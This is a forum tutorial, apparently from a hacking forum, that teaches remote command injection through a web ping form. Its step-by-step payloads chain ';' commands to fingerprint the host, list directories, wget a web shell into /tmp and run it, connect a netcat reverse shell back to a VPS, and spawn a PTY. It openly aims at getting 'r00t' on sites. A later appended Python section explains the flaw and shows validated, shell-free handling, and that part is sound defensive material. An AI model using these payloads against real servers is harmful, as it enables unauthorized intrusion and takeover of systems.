[Tutorial][HQ] Remote Code Execution [Noob Friendly]


Post by Admin Tue Jul 29, 2014 2:50 pm

Disclaimer
I am not responsible for how you use this tutorial; it was created for educational purposes.

Intro
Hello guys and welcome to my tutorial on Remote Code Execution (RCE),
I will not be providing any real targets but will be providing a realistic example,
RCE is a very useful exploit as it lets you execute direct commands to the system,
Therefore allowing us to upload files, delete files and manipulate the system how we wish.

How RCE happens
RCE most commonly happens when a website passes unsanitized user input to the system,
For example in this tutorial we will be using a ping IP input shown in the image below.
[Image not available in this copy.]

Check target
Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" (without quotes) into the input box, followed by a *nix command, as in the example below
Code:
;uname -a
The ";" acts as a command separator: it joins an extra command to the supplied argument.
The following image will show the output of what we have entered.
[Image not available in this copy.]

Okay so now what
Okay so we have found that via the input we have been able to execute a *nix command to display box info,
Now what else is there we can do hmm... Okay let's try to pull up what OS the box is running with the following command,
Code:
;cat /etc/issue
This command has provided us the info of the box's OS as shown below

[Image not available in this copy.]

Well that was cool
Okay so we have now found some minor useless info,
I am sure you are thinking no more minor stuff, let's move on to get "r00t".
Now let's try to list the current directory with "ls".
[Image not available in this copy.]

We have got no output!?! I guess it's not that vulnerable, let's move on shall we...
WRONG! It just means the current directory is not able to be listed.
As shown before, ";" joins commands, so let's try to join 2 commands by doing the following to move up a directory and then list.
Code:
;cd ..;ls
[Image not available in this copy.]
Success, we listed the directories. +1 to you sir!
Now it's a widely known fact that the tmp directory is usually writeable, so let's navigate there and list by entering the following code.
Code:
;cd ..;cd tmp;ls
[Image not available in this copy.]


Woo! We listed a writable directory, now let's try to wget a shell to this directory by entering this code;
Code:
;cd ..;cd tmp;wget [You must be registered and logged in to see this link.] > a.php

[You must be registered and logged in to see this link.]

Now that your shell has been uploaded, you could access the shell via terminal by entering,
Code:
;cd ..;cd tmp;php a.php

Alternative to a web shell
Okay so my favourite way of gaining access to all the sites is the following way,
Test for vulnerable input and instead of executing a bunch of system commands try to spawn a shell and back connect via netcat on a VPS.
Now for the actual code to spawn a shell on the server, I suggest trying the following examples, they have always served me well;
[You must be registered and logged in to see this link.]
Obviously change "10.0.0.1" to your VPS IP and change the port, I suggest using port 443 as it's commonly open.
From there, for ease of use, I will normally spawn a PTY (pseudo terminal) shell from bash by using the following code
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'

Tutorial written 100% by me.

I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.

Admin
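
The ping form described in the post, seen from the server side, as an added example that is not part of the original post: it shows why the ";" input is parsed as extra commands when the value is pasted into a shell string, and the hardened form that validates the value and never involves a shell. The function names and the `ping -c 1` command line are assumptions; the tutorial does not show the server's code.

```python
import ipaddress
import shlex
import subprocess

# Shell control operators that end one command and start another.
CONTROL = {";", "&", "&&", "|", "||"}


def vulnerable_cmdline(host: str) -> str:
    # Anti-pattern: user input pasted into a string that a shell will parse.
    return "ping -c 1 " + host


def commands_seen_by_shell(cmdline: str) -> list[list[str]]:
    """Tokenize roughly as sh would and split on operators. Executes nothing."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in CONTROL:
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return [c for c in commands if c]


def safe_argv(host: str) -> list[str]:
    """Allow-list validation: the value must parse as an IPv4 address."""
    addr = ipaddress.IPv4Address(host)  # raises ValueError on anything else
    return ["ping", "-c", "1", str(addr)]


def ping(host: str) -> int:
    # argv list with shell=False: no shell ever parses the user's input.
    result = subprocess.run(safe_argv(host), shell=False,
                            timeout=5, capture_output=True)
    return result.returncode


def is_rejected(host: str) -> bool:
    """True when the hardened path refuses the input (constructed test helper)."""
    try:
        safe_argv(host)
        return False
    except ValueError:
        return True
```

With the tutorial's inputs, `commands_seen_by_shell(vulnerable_cmdline(";uname -a"))` yields two commands, while `safe_argv` rejects the same string before any process is started.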